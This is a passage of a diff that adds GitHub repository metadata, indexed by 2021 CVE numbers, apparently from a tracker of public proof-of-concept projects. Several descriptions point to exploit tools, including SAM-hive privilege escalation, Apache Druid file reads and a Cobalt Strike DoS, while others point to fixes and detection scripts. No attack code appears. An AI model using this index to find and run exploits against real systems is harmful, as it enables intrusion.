"https:\/\/avatars.githubusercontent.com\/u\/34414625?v=4", + "html_url": "https:\/\/github.com\/lixiang957", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lixiang957\/CVE-2021-36630", + "description": null, + "fork": false, + "created_at": "2023-01-15T09:55:38Z", + "updated_at": "2023-01-20T07:30:16Z", + "pushed_at": "2023-01-15T10:01:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36747.json b/2021/CVE-2021-36747.json new file mode 100644 index 0000000000..52a2a9642e --- /dev/null +++ b/2021/CVE-2021-36747.json @@ -0,0 +1,33 @@ +[ + { + "id": 387884646, + "name": "CVE-2021-36747", + "full_name": "cseasholtz\/CVE-2021-36747", + "owner": { + "login": "cseasholtz", + "id": 9737260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9737260?v=4", + "html_url": "https:\/\/github.com\/cseasholtz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cseasholtz\/CVE-2021-36747", + "description": null, + "fork": false, + "created_at": "2021-07-20T18:45:30Z", + "updated_at": "2022-09-14T16:21:49Z", + "pushed_at": "2021-07-20T19:32:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36749.json b/2021/CVE-2021-36749.json new file mode 100644 index 0000000000..9199371878 --- /dev/null +++ b/2021/CVE-2021-36749.json @@ -0,0 +1,130 @@ +[ + { + "id": 369719890, + "name": "PocList", + "full_name": "sma11new\/PocList", + "owner": { + "login": "sma11new", + "id": 53944964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53944964?v=4", + "html_url": "https:\/\/github.com\/sma11new", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sma11new\/PocList", + "description": "漏洞POC、EXP合集,持续更新。Apache Druid-任意文件读取(CVE-2021-36749)、ConfluenceRCE(CVE-2021-26084)、ZeroShell防火墙RCE(CVE-2019-12725)、ApacheSolr任意文件读取、蓝凌OA任意文件读取、phpStudyRCE、ShowDoc任意文件上传、原创先锋后台未授权、Kyan账号密码泄露、TerraMasterTos任意文件读取、TamronOS-IPTV系统RCE、Wayos防火墙账号密码泄露", + "fork": false, + "created_at": "2021-05-22T05:06:33Z", + "updated_at": "2024-11-18T08:00:32Z", + "pushed_at": "2021-11-21T10:34:06Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-12725", + "cve-2021-26084", + "cve-2021-36749" + ], + "visibility": "public", + "forks": 38, + "watchers": 169, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 416979824, + "name": "CVE-2021-36749", + "full_name": "BrucessKING\/CVE-2021-36749", + "owner": { + "login": "BrucessKING", + "id": 39517489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39517489?v=4", + "html_url": "https:\/\/github.com\/BrucessKING", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrucessKING\/CVE-2021-36749", + "description": "Apache Druid 任意文件读取", + "fork": false, + "created_at": "2021-10-14T03:47:02Z", + "updated_at": "2024-09-11T17:10:38Z", + "pushed_at": "2021-10-15T02:31:03Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430263283, + "name": "apache_druid_CVE-2021-36749", + "full_name": "zwlsix\/apache_druid_CVE-2021-36749", + "owner": { + "login": "zwlsix", + "id": 88372814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88372814?v=4", + "html_url": "https:\/\/github.com\/zwlsix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwlsix\/apache_druid_CVE-2021-36749", + "description": "CVE-2021-36749 Docker 漏洞复现", + "fork": false, + "created_at": "2021-11-21T03:23:00Z", + "updated_at": "2021-12-02T09:51:28Z", + "pushed_at": "2021-11-21T10:26:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437588032, + "name": "CVE-2021-36749", + "full_name": "Jun-5heng\/CVE-2021-36749", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-36749", + "description": "Apache Druid LoadData 任意文件读取漏洞 \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2021-12-12T15:50:02Z", + "updated_at": "2021-12-12T17:52:28Z", + "pushed_at": "2021-12-12T17:52:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36750.json b/2021/CVE-2021-36750.json new file mode 100644 index 0000000000..e030130c78 --- /dev/null +++ b/2021/CVE-2021-36750.json @@ -0,0 +1,33 @@ +[ + { + "id": 434045068, + "name": "CVE-2021-36750", + "full_name": "mamba-4-ever\/CVE-2021-36750", + "owner": { + "login": "mamba-4-ever", + "id": 58200906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58200906?v=4", + "html_url": "https:\/\/github.com\/mamba-4-ever", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mamba-4-ever\/CVE-2021-36750", + "description": null, + "fork": false, + "created_at": "2021-12-02T01:40:08Z", + "updated_at": "2021-12-02T01:40:09Z", + "pushed_at": "2021-10-14T17:44:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36782.json b/2021/CVE-2021-36782.json new file mode 100644 index 0000000000..071c962fb5 --- /dev/null +++ b/2021/CVE-2021-36782.json @@ -0,0 +1,33 @@ +[ + { + "id": 573138430, + "name": "tf-cve-2021-36782", + "full_name": "fe-ax\/tf-cve-2021-36782", + "owner": { + "login": "fe-ax", + "id": 1322541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1322541?v=4", + "html_url": "https:\/\/github.com\/fe-ax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fe-ax\/tf-cve-2021-36782", + "description": "A Terraform module to launch Rancher 2.6.6 for blog article about CVE-2021-36782", + "fork": false, + "created_at": "2022-12-01T19:30:27Z", + "updated_at": "2022-12-14T13:53:07Z", + "pushed_at": "2024-10-28T16:07:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3679.json b/2021/CVE-2021-3679.json new file mode 100644 index 0000000000..cbc06e2f16 --- /dev/null +++ b/2021/CVE-2021-3679.json @@ -0,0 +1,33 @@ +[ + { + "id": 387712955, + "name": "RingBufferDetonator", + "full_name": "aegistudio\/RingBufferDetonator", + "owner": { + "login": "aegistudio", + "id": 6104287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6104287?v=4", + "html_url": "https:\/\/github.com\/aegistudio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aegistudio\/RingBufferDetonator", + "description": "Exploitation for CVE-2021-3679 and document for its fix", + "fork": false, + "created_at": "2021-07-20T07:42:25Z", + "updated_at": "2021-09-11T13:15:34Z", + "pushed_at": "2021-07-21T14:09:46Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36798.json b/2021/CVE-2021-36798.json new file mode 100644 index 0000000000..ab1eafb5a4 --- /dev/null +++ b/2021/CVE-2021-36798.json @@ -0,0 +1,97 @@ +[ + { + "id": 397919131, + "name": "CVE-2021-36798", + "full_name": "M-Kings\/CVE-2021-36798", + "owner": { + "login": "M-Kings", + "id": 66290587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66290587?v=4", + "html_url": "https:\/\/github.com\/M-Kings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M-Kings\/CVE-2021-36798", + "description": "Cobalt Strike < 4.4 dos CVE-2021-36798 ", + "fork": false, + "created_at": "2021-08-19T11:26:51Z", + "updated_at": "2024-08-12T20:15:44Z", + "pushed_at": "2021-08-19T11:46:12Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-36798" + ], + "visibility": "public", + "forks": 11, + "watchers": 37, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 403602684, + "name": "CobaltStrikeDos", + "full_name": "JamVayne\/CobaltStrikeDos", + "owner": { + "login": "JamVayne", + "id": 39869990, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39869990?v=4", + "html_url": "https:\/\/github.com\/JamVayne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JamVayne\/CobaltStrikeDos", + "description": "CVE-2021-36798: CobaltStrike < 4.4 Dos", + "fork": false, + "created_at": "2021-09-06T11:49:03Z", + "updated_at": "2024-08-12T20:16:12Z", + "pushed_at": "2021-09-26T10:02:37Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 103, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571614292, + "name": "CobaltSploit", + "full_name": "sponkmonk\/CobaltSploit", + "owner": { + "login": "sponkmonk", + "id": 31475386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31475386?v=4", + "html_url": "https:\/\/github.com\/sponkmonk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sponkmonk\/CobaltSploit", + "description": "Tool which leverages CVE-2021-36798 (HotCobalt) and related work from SentinelOne to DoS CobaltStrike 4.2 and 4.3 servers", + "fork": false, + "created_at": "2022-11-28T14:09:43Z", + "updated_at": "2022-05-24T08:55:57Z", + "pushed_at": "2022-09-27T06:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36799.json b/2021/CVE-2021-36799.json new file mode 100644 index 0000000000..b3f8ece1d0 --- /dev/null +++ b/2021/CVE-2021-36799.json @@ -0,0 +1,38 @@ +[ + { + "id": 387188990, + "name": "ets5-password-recovery", + "full_name": "robertguetzkow\/ets5-password-recovery", + "owner": { + "login": "robertguetzkow", + "id": 25986807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25986807?v=4", + "html_url": "https:\/\/github.com\/robertguetzkow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertguetzkow\/ets5-password-recovery", + "description": "ETS5 Password Recovery Tool is a PoC for CVE-2021-36799", + "fork": false, + "created_at": "2021-07-18T13:59:43Z", + "updated_at": "2024-10-23T17:42:11Z", + "pushed_at": "2022-07-23T14:08:41Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "decryption", + "poc", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 31, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36808.json b/2021/CVE-2021-36808.json new file mode 100644 index 0000000000..b131f3792e --- /dev/null +++ b/2021/CVE-2021-36808.json @@ -0,0 +1,33 @@ +[ + { + "id": 426136857, + "name": "CVE-2021-36808", + "full_name": "ctuIhu\/CVE-2021-36808", + "owner": { + "login": "ctuIhu", + "id": 59749563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59749563?v=4", + "html_url": "https:\/\/github.com\/ctuIhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ctuIhu\/CVE-2021-36808", + "description": "A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.", + "fork": false, + "created_at": "2021-11-09T07:48:55Z", + "updated_at": "2024-08-25T22:49:14Z", + "pushed_at": "2021-11-09T07:54:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36934.json b/2021/CVE-2021-36934.json new file mode 100644 index 0000000000..5be165295a --- /dev/null +++ b/2021/CVE-2021-36934.json @@ -0,0 +1,665 @@ +[ + { + "id": 387926337, + "name": "ShadowSteal", + "full_name": "HuskyHacks\/ShadowSteal", + "owner": { + "login": "HuskyHacks", + "id": 57866415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4", + "html_url": "https:\/\/github.com\/HuskyHacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuskyHacks\/ShadowSteal", + "description": "Pure Nim implementation for exploiting CVE-2021-36934, the SeriousSAM local privilege escalation", + "fork": false, + "created_at": "2021-07-20T22:16:49Z", + "updated_at": "2024-11-17T00:16:12Z", + "pushed_at": "2022-01-16T02:09:46Z", + "stargazers_count": 207, + "watchers_count": 207, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploit-development", + "nim", + "windows" + ], + "visibility": "public", + "forks": 37, + "watchers": 207, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 388119730, + "name": "CVE-2021-36934", + "full_name": "JoranSlingerland\/CVE-2021-36934", + "owner": { + "login": "JoranSlingerland", + "id": 32357871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32357871?v=4", + "html_url": "https:\/\/github.com\/JoranSlingerland", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoranSlingerland\/CVE-2021-36934", + "description": "Fix for the CVE-2021-36934", + "fork": false, + "created_at": "2021-07-21T13:06:51Z", + "updated_at": "2023-01-22T08:49:14Z", + "pushed_at": "2021-10-15T23:44:37Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 388194766, + "name": "CVE-2021-36934", + "full_name": "n3tsurge\/CVE-2021-36934", + "owner": { + "login": "n3tsurge", + "id": 1574741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574741?v=4", + "html_url": "https:\/\/github.com\/n3tsurge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3tsurge\/CVE-2021-36934", + "description": "Detection and Mitigation script for CVE-2021-36934 (HiveNightmare aka. SeriousSam)", + "fork": false, + "created_at": "2021-07-21T17:24:44Z", + "updated_at": "2021-08-25T06:37:22Z", + "pushed_at": "2021-07-22T02:10:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 388286318, + "name": "VSSCopy", + "full_name": "Wh04m1001\/VSSCopy", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/VSSCopy", + "description": "Small and dirty PoC for CVE-2021-36934", + "fork": false, + "created_at": "2021-07-22T00:55:23Z", + "updated_at": "2021-07-26T14:35:30Z", + "pushed_at": "2021-07-22T02:15:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 388311709, + "name": "Invoke-HiveNightmare", + "full_name": "WiredPulse\/Invoke-HiveNightmare", + "owner": { + "login": "WiredPulse", + "id": 19207515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19207515?v=4", + "html_url": "https:\/\/github.com\/WiredPulse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WiredPulse\/Invoke-HiveNightmare", + "description": "PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer", + "fork": false, + "created_at": "2021-07-22T03:07:56Z", + "updated_at": "2024-08-12T20:14:53Z", + "pushed_at": "2022-09-24T20:40:17Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 388374451, + "name": "SeriousSam", + "full_name": "romarroca\/SeriousSam", + "owner": { + "login": "romarroca", + "id": 87074019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87074019?v=4", + "html_url": "https:\/\/github.com\/romarroca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/romarroca\/SeriousSam", + "description": "HiveNightmare a.k.a. SeriousSam Local Privilege Escalation in Windows – CVE-2021-36934", + "fork": false, + "created_at": "2021-07-22T07:49:29Z", + "updated_at": "2024-05-12T04:41:05Z", + "pushed_at": "2021-07-22T11:39:31Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 388449471, + "name": "Invoke-HiveDreams", + "full_name": "WiredPulse\/Invoke-HiveDreams", + "owner": { + "login": "WiredPulse", + "id": 19207515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19207515?v=4", + "html_url": "https:\/\/github.com\/WiredPulse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WiredPulse\/Invoke-HiveDreams", + "description": "A capability to identify and remediate CVE-2021-36934 (HiveNightmare)", + "fork": false, + "created_at": "2021-07-22T12:10:41Z", + "updated_at": "2023-05-18T04:28:59Z", + "pushed_at": "2021-07-22T14:42:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 388453276, + "name": "CVE-2021-36934", + "full_name": "tda90\/CVE-2021-36934", + "owner": { + "login": "tda90", + "id": 48199685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48199685?v=4", + "html_url": "https:\/\/github.com\/tda90", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tda90\/CVE-2021-36934", + "description": "CVE-2021-36934 PowerShell Fix", + "fork": false, + "created_at": "2021-07-22T12:24:24Z", + "updated_at": "2021-07-29T06:47:23Z", + "pushed_at": "2021-07-29T06:47:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 388499292, + "name": "CVE-2021-36934", + "full_name": "VertigoRay\/CVE-2021-36934", + "owner": { + "login": "VertigoRay", + "id": 792482, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/792482?v=4", + "html_url": "https:\/\/github.com\/VertigoRay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VertigoRay\/CVE-2021-36934", + "description": "Windows Elevation of Privilege Vulnerability (SeriousSAM)", + "fork": false, + "created_at": "2021-07-22T14:53:09Z", + "updated_at": "2021-08-06T14:49:37Z", + "pushed_at": "2021-07-24T12:03:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 388607076, + "name": "CVE-2021-36934", + "full_name": "bytesizedalex\/CVE-2021-36934", + "owner": { + "login": "bytesizedalex", + "id": 17046773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17046773?v=4", + "html_url": "https:\/\/github.com\/bytesizedalex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bytesizedalex\/CVE-2021-36934", + "description": "CVE-2021-36934 PowerShell scripts", + "fork": false, + "created_at": "2021-07-22T21:54:45Z", + "updated_at": "2021-07-28T01:48:39Z", + "pushed_at": "2021-07-23T19:14:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 389125344, + "name": "CVE-2021-36934", + "full_name": "Preventions\/CVE-2021-36934", + "owner": { + "login": "Preventions", + "id": 46875161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46875161?v=4", + "html_url": "https:\/\/github.com\/Preventions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Preventions\/CVE-2021-36934", + "description": "C# PoC for CVE-2021-36934\/HiveNightmare\/SeriousSAM", + "fork": false, + "created_at": "2021-07-24T14:58:10Z", + "updated_at": "2023-09-06T02:44:58Z", + "pushed_at": "2021-07-24T13:01:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 389226743, + "name": "PyNightmare", + "full_name": "Sp00p64\/PyNightmare", + "owner": { + "login": "Sp00p64", + "id": 59793368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59793368?v=4", + "html_url": "https:\/\/github.com\/Sp00p64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sp00p64\/PyNightmare", + "description": "PoC for CVE-2021-36934 Aka HiveNightmare\/SeriousSAM written in python3", + "fork": false, + "created_at": "2021-07-25T00:31:11Z", + "updated_at": "2023-09-10T12:41:42Z", + "pushed_at": "2021-07-25T01:19:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389410092, + "name": "Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM", + "full_name": "jmaddington\/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM", + "owner": { + "login": "jmaddington", + "id": 2353597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2353597?v=4", + "html_url": "https:\/\/github.com\/jmaddington", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jmaddington\/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM", + "description": "This PowerShell script will take the mitigation measures for CVE-2021-36934 described by Microsoft and the US CERT team. https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-36934 https:\/\/kb.cert.org\/vuls\/id\/506989 USE AT YOUR OWN RISK -- BACKUPS MAY BREAK.", + "fork": false, + "created_at": "2021-07-25T18:00:35Z", + "updated_at": "2024-04-09T12:36:03Z", + "pushed_at": "2021-07-25T18:10:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 389555386, + "name": "CVE-2021-36934", + "full_name": "0x0D1n\/CVE-2021-36934", + "owner": { + "login": "0x0D1n", + "id": 23523771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23523771?v=4", + "html_url": "https:\/\/github.com\/0x0D1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0D1n\/CVE-2021-36934", + "description": null, + "fork": false, + "created_at": "2021-07-26T08:01:08Z", + "updated_at": "2021-07-26T08:18:37Z", + "pushed_at": "2021-07-26T08:18:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389878651, + "name": "CVE-2021-36934", + "full_name": "exploitblizzard\/CVE-2021-36934", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/CVE-2021-36934", + "description": "HiveNightmare aka SeriousSAM ", + "fork": false, + "created_at": "2021-07-27T06:54:30Z", + "updated_at": "2023-04-21T05:37:19Z", + "pushed_at": "2021-07-27T06:56:18Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390844451, + "name": "CVE-2021-36934", + "full_name": "irissentinel\/CVE-2021-36934", + "owner": { + "login": "irissentinel", + "id": 79321563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79321563?v=4", + "html_url": "https:\/\/github.com\/irissentinel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irissentinel\/CVE-2021-36934", + "description": "CVE-2021-36934 HiveNightmare vulnerability checker and workaround", + "fork": false, + "created_at": "2021-07-29T20:35:22Z", + "updated_at": "2021-07-30T12:29:18Z", + "pushed_at": "2021-07-30T12:29:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 391724401, + "name": "CVE-2021-36934", + "full_name": "websecnl\/CVE-2021-36934", + "owner": { + "login": "websecnl", + "id": 20278695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20278695?v=4", + "html_url": "https:\/\/github.com\/websecnl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/websecnl\/CVE-2021-36934", + "description": "SeriousSAM Auto Exploiter", + "fork": false, + "created_at": "2021-08-01T19:54:31Z", + "updated_at": "2024-08-12T20:15:11Z", + "pushed_at": "2021-09-04T09:27:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 391965692, + "name": "poc_CVE-2021-36934", + "full_name": "grishinpv\/poc_CVE-2021-36934", + "owner": { + "login": "grishinpv", + "id": 88319804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88319804?v=4", + "html_url": "https:\/\/github.com\/grishinpv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grishinpv\/poc_CVE-2021-36934", + "description": "POC experiments with Volume Shadow copy Service (VSS)", + "fork": false, + "created_at": "2021-08-02T13:47:17Z", + "updated_at": 